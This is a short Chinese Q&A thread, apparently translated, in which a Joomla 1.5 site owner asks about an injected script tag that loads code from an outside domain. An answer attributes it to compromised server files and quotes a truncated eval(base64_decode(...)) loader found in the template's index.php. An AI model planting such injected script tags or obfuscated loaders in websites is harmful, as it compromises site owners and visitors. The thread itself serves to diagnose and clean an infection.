我的Joomla! 1.5网站最近成为了一个似乎是XSS攻击的受害者(当涉及到这个东西时,我是一个菜鸟)...以下代码注入了网站(某处)
<script src="http://sweepstakesandcontestsdo.com/pmg.php"></script>
我不知道到底在哪里。我搜索了数据库以及文件,但却找不到结果。有什么明显的东西我不见了吗?
答案 0 :(得分:2)
我的网站也成为这次袭击的受害者,仍在调查中。它不是XSS攻击,您的服务器文件被泄露。查看索引php文件中的系统模板,你会发现一个像这样的代码块:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb.....>
base64编码字符串是执行各种令人讨厌的事情的PHP代码。